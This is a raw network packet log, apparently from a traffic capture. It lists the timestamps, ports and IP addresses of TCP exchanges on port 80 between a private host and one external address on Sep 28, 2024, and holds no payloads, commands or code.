Sep 28, 2024 07:32:13.683299065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683306932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.683312893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683346033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.683366060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.683507919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683518887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683535099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683547020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683553934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.683562994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683573961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683581114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.683585882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683605909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.683634043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.683810949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683821917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683832884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683860064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.683883905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.683948040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683959007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683969021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683974028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683984041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683991909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.683995008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684007883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684016943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684024096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.684027910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684040070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684060097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.684068918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.684098005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.684268951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684313059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.684353113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684364080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684374094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684391022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684396982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.684401989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684413910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684417009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.684442997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.684453011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.684623957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684634924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684645891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684654951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684664011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684670925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.684679985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684693098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.684708118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684719086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684725046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.684730053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684741020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684751034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.684755087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684772968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684772968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.684783936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684793949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.684812069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.684812069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.684829950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.685168028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.685220003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.685256004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.685266972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.685277939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.685288906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.685295105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.685300112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.685301065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.685338020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.685338020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.685408115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.685441017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.817819118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.822732925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.040512085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.040564060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.040580988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.040617943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.040647984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.040662050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.040673018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.040683985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.040704012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.040777922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.040782928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.040795088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.040827036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.040851116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.040931940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.040944099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.040955067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.040965080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.040973902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.040977001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.040988922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.040992022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.041001081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041066885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.041192055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041203022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041213989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041224003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041234016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041234970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.041266918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.041338921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.041400909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041418076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041429043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041439056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041440964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.041450024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041460991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.041479111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.041481018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041492939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041505098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.041536093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.041712999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041723967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041734934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041744947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041755915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041757107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.041770935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.041770935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041784048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.041802883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.041826963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.041987896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042000055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042009115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042018890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042030096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042038918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042042017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.042052984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042062998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.042062998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042079926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.042103052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.042330980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042341948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042351961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042361975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042373896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042382956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042386055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.042393923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042401075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.042407036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042421103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.042438984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.042680025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042690039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042699099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042709112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042717934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042721033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.042728901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042740107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042742968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.042751074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042754889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.042761087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042771101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042782068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042783976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.042792082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.042810917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.042830944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.043114901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043129921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043138981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043148994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043158054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043160915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.043169022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043176889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.043180943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043190002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043200016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.043200970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043205976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043215036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043221951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.043231010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043257952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.043268919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.043442965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043477058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043498993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.043517113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.043541908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043550968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043562889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043585062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.043617010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.043644905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043656111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043678045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043687105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.043689013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043700933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.043700933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043719053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.043744087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.043898106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043906927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043921947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043932915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043945074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043955088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.043966055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.043975115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.043998003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.044078112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044089079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044135094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.044203997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044214010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044224024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044234037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044244051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044251919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044255018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.044267893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.044280052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.044306993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.044533014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044579029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.044585943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044595957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044631004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.044642925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044653893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044694901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.044763088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044773102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044781923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044810057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.044820070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.044871092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044882059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044893026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.044912100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.044926882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.045038939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.045056105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.045068026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.045078039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.045079947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.045089006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.045109987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.045137882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.045532942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.045579910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.045588017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.045598984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.045636892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.045706034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.045717001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.045727015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.045733929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.045754910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.045785904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.045850992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.045917034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.045922041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.045929909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.045939922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.045952082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.045958042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.045962095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.045970917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.045972109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.046000004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.046170950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.046181917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.046191931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.046225071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.046236038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.128237009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.128257036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.128266096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.128304005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.128323078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.128384113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.128396034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.128406048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.128416061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.128427029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.128451109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.128463030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.128619909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.128631115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.128640890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.128652096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.128663063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.128669977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.128680944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.128724098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.128747940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.128789902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.169826031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.169882059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.169899940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.169915915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.169930935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.169955015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.169959068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.169991016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170000076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170023918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170037985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170068979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170074940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170106888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170123100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170140982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:14.170156002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:14.170173883 CEST	80	49730	185.215.113.37	192.168.2.4
